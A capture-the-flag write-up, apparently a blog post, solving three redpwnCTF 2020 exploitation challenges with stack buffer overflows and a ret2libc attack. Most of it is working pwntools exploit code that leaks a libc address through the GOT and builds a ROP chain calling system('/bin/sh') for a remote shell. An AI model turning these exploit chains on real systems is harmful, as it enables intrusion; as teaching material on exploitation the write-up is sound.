REDPWN CTF Pwning Writeup

This is a very basic overflow question. The code is as follows

coffer-overflow-0 code

We just have to overflow(simply enter excess of 16 characters) the buffer ‘name’ to get a shell on the remote server. The flag is — flag{b0ffer_0verf10w_3asy_as_123}.

coffer-overflow-1 code

First let us find out the offset. To do that, lets look at the disassembled code.

disassembly of coffer-overflow-1

Here we can see on <+117> that the register rax is being compared to $rbp-0x8. Let us use a cyclic offset and overflow the function and see what value $rbp-0x8 contains.

Calculate offset

So we get the offset value to be 24. Then we can write a simple script to appropriately overflow the stack and set the value of code to be ‘0xcafebabe’.

from pwn import *
address = 0xcafebabe

#p = process(‘./coffer-overflow-1’)
p = remote(‘2020.redpwnc.tf’,31255)
payload = b’a’ * 24
payload += p64(address)

p.recvuntil(‘with?’)
p.sendline(payload)
p.interactive()

This will give us a shell and we can read the flag — flag{th1s_0ne_wasnt_pure_gu3ssing_1_h0pe}.

the-library code

Let us check what security features are enabled before proceeding further.

NX is enabled which means that we cannot directly execute shellcode from the stack. Let us do a ret2libc attack in this case.

To do a ret2libc attack we first need to leak the libc base. The following code snippet details this:

from pwn import *

p = remote(‘2020.redpwnc.tf’,31350)
#p = process(‘./the-library’)
binary = ELF(‘the-library’)
context.update(arch=’amd64')
rop = ROP(‘the-library’)

pop_rdi = rop.find_gadget([‘pop rdi’,’ret’])[0]
#print(“pop rdi: “,hex(pop_rdi))

payload = b’a’ * 24
payload += p64(pop_rdi)
payload += p64(binary.got[‘puts’])
payload += p64(binary.plt[‘puts’])
payload += p64(binary.symbols[‘main’])

p.recvuntil(‘name?\n’)
p.sendline(payload)

p.recvlines(2)
libc_leak=p.recv()[0:6]
libc_puts=u64(libc_leak.ljust(8,b”\x00"))
print(“puts: “,hex(libc_puts))

We get the address of puts as ‘0x7ff77d1109c0’. We use https://libc.blukat.me/ to search the database and we find the library to be libc6_2.27–3ubuntu1_amd64.

We then get the base address of the library and find the system function in it and add it to the payload and send it. The following is the final exploit.

from pwn import *

p = remote(‘2020.redpwnc.tf’,31350)
#p = process(‘./the-library’)
libc = ELF(‘/home/rasput1n/Downloads/libc6_2.27–3ubuntu1_amd64.so’)
binary = ELF(‘the-library’)
context.update(arch=’amd64')
rop = ROP(‘the-library’)

pop_rdi = rop.find_gadget([‘pop rdi’,’ret’])[0]

payload = b’a’ * 24
payload += p64(pop_rdi)
payload += p64(binary.got[‘puts’])
payload += p64(binary.plt[‘puts’])
payload += p64(binary.symbols[‘main’])

p.recvuntil(‘name?\n’)
p.sendline(payload)

p.recvlines(2)
libc_leak=p.recv()[0:6]
libc_puts=u64(libc_leak.ljust(8,b”\x00"))
libc_base=libc_puts-libc.symbols[“puts”]
print(“puts: “,hex(libc_puts))
print(“base: “,hex(libc_base))

payload = 24 * b’A’
payload += p64(pop_rdi + 1)
payload += p64(pop_rdi)
payload += p64(libc_base + next(libc.search(b”/bin/sh”)))
payload += p64(libc_base + libc.symbols[‘system’])
print(payload)

p.sendline(payload)

p.interactive()

We get a shell and we read the flag — flag{jump_1nt0_th3_l1brary}.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store